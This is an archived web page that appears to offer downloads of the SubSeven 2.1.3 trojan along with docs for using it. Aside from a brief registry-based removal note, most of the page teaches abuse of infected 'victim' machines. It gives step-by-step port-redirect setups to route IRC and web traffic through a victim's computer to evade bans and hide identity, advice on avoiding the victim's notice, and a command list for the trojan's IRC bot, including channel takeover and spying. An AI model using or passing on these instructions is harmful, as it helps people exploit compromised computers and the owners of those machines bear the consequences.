http://home.scarlet.be/~tsb64544/trojan/dl_s7.

htm

- SubSeven 2.1.3 -

Client : subseven_client.zip Server + ServerEditor : subseven_server.zip

Docs :

Howto Remove the server:

* Goto : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run or RunServices * Delete Key : WinLoader = '[can be anything]'. * Remeber WinLoader Value! * reboot the system. * Delete file : Delete the exe in Winloader Value This trojan can also be installed otherwise, but this is the default way.

Port Redirect
Well first of all, -What is Port redirect? To put it in very simple words, it allows you to use common internet services(irc,http,ftp..) through someone's pc/ip. Just like a proxy(http,socks,ftp....). The concept is quite simple, a port is listening on the VICTIM (e.g 6667), when a connection is made to that port it automatically redirects to the OUTPUT PORT/IP(e.g. irc.dal.net:7000).You define the "Input port", "Output port" and "Output IP" when you enable "Port Redirect" through "Add port" in the Subseven Client. Lets says your VICTIM is "A" and DALNET is "B". What happens is that Port Redirect opens a port on "A", when a connection is made on that particular port it redirects the CONNECTION to "B". Therefore "B" (Dalnet) thinks its "A" thats connecting ....though its you that is connected. WHY?? ---Port Redirect has many benefits. You could use it to EVADE KLINES/GLINES on IRC, just to be anonymous, just for the heck of it or you're paranoid?? :P ----------Example 1: ----------If u want to use Port redirect for IRC (e.g. Dalnet) INPUT PORT: ---------You can put any port as the INPUT PORT. This port will be listening on the VICTIM, e.g u can use 6667. Using 6667 has an advantage which I will discuss a little later in this text. OUTPUT HOST/IP: -------------This has to be the address(host or IP) of the IRC server. For Dalnet u would use irc.dal.net(216.65.117.128) or even the direct address of any Dalnet server like stlouis.dal.net, liberty.dal.net ....and so on. You can either put the hostname or the IP. OUTPUT PORT: -----------The output port depends on the service or in the case of IRC ..the server type(dalnet,undernet,efnet etc). For Dalnet you should use 7000 as the output port. You can check this in your IRC client. For undernet you should use 6667.Port 6667 is the Default for most IRC servers. NOTE:

----After you have done all this, CLICK on "Refresh list" from the "Port Redirect" page in Subseven client to make sure you have ENABLED port redirect correctly. You should see the port(s) you just added in the "Redirected Ports" list. USAGE: ----In your IRC CLIENT(e.g mirc) type this /server 121.232.12.27 (where 121.232.12.27 is the IP of your VICTIM) If u set the "INPUT PORT" other than 6667 then type this /server 24.24.24.24:6669 (where 6669 is the "INPUT PORT" u chose) After you have done this ..you will see that it connects you to Dalnet...that was simple right?? DONT ASK...the DALNET ircops how UNCA HELL made good use of Port Redirect!! `;) IN A NUTSHELL: -------------Input port: 6667 Output host/IP: irc.dal.net Output port: 7000 Usage in Irc Client: /server 121.232.12.27 (replace 121.232.12.27 with the VIctim's IP) ---------Example 2: ---------If you want to use "Port Redirect" for HTTP (browsing) INPUT PORT: ---------Any port u like. You can use 80(default HTTP port). BUT using port 80 has an advantage and a disadvantage. Advantage is that u can simply put the IP of the VICTIM in you browser and it REDIRECTS you to www.antionline.com The disadvantage is that since a lot of lamers scan for well knows services(on port 21,80 etc..) so this might cause a lot of problems to the victim and as a result he might notice something is wrong :).For those of you that are very new to all this I recommend 80.Otherwise use 81(or whatever) OUTPUT HOST/IP: -------------209.166.177.37(www.antionline.com) OUTPUT PORT: -----------80 should be used for most webservers. USAGE: -----

Open your browser, put the IP of your victim like this: http://24.24.24.24 or http://24.24.24.24:81 (where 81 is the "INPUT PORT" u chose). IN A NUTSHELL: -------------Input port: 81 Output host/IP: www.antionline.com (Replace with the URL of the site to reditect) Output port: 80 Usage in browser: http://0.0.0.0:81 (Replace 0.0.0.0 with the Victim's IP) SUMMARY: ~~~~~~~~ You can use PORT REDIRECT for Telnet, Ftp, Http, Nntp, IRC etc .... But it is recommended to use VICTIMS with fast connections(ISDN,cable etc..) for this and for all those of you that read this and say ..."I knew this already"...WELL THIS ISNT MEANT FOR U SO ....... 2+2 umm 5??

IRC BOT
Introduction Firstly one your IRC bot joins your IRC channel you have to identify to it so that it accepts commands from you. When you set up the bot you would have set a prefix most probably. At default it is just @ but lets say we selected hell@ then all our commands would be prefixed with hell@. OK now we identify to the bot and to do this we send hell@login password if the password set for bot login was firez then we would send this hell@login firez Take note of spaces or the commands will not work properly. It is strongly suggested that you send all commands to the bot in /query botnick (prvmsg mode) rather than in open chan where someone will see your bot login password and prefix. Commands login password - the bot will verify acceptance of password help - displays the help menu newpass password - sets a new login password join #channelname key - bot joins designated channel cycle #chan - It will cycle the chan you told it to cycle. If you do not specify a chan it will cycle the current chan.

op #chan nickname - gives operator status to the specified nick in the specified chan. deop #chan nickname - removes operator status quit quitmsg - quits and displays leaving msg nick newnickname - changes bot nickname raw rawcommand - allows you to enter a raw irc server command prefix newprefix - allows you to set a new command prefix ban #chan nickname - bans specified user unban #chan nickname - unbans specified user say #chan/nickname texttosay - says text in channel info - will report the current server settings kick #chan nick - will kick the specified user reroute #chan/nickname #chan/nickname - this will reroute everything said from first entry to the second entry. reroute<> #chan/nickname #chan/nickname - will reroute both ways rroff - cancels reroute NB if you send reroute command again it overrides first reroute command. Commands for operating the bot on a remote server. spy_login #server port - ie spy_login irc.dal.net 7000 would log bot also onto dalnet. spy_nick newnickname - nickname on remote server spy_join #chan key - remote chan to join spy_part partreason spy_quit - quits remote server but do not specify a reason spy_start #chan/nickname #chan/nickname - the first parameter is on the remote server and the second parameter ir on the local server. spy_start<> #chan/nickname #chan/nickname - the first parameter is on the remote server and the second parameter ir on the local server. This links the chans and sends text both ways. Note not only can you see what is said on a distand server but they can see what you say on the local server. Do not use this if you wish to exercise stealth.

spy_stop - stops spy mode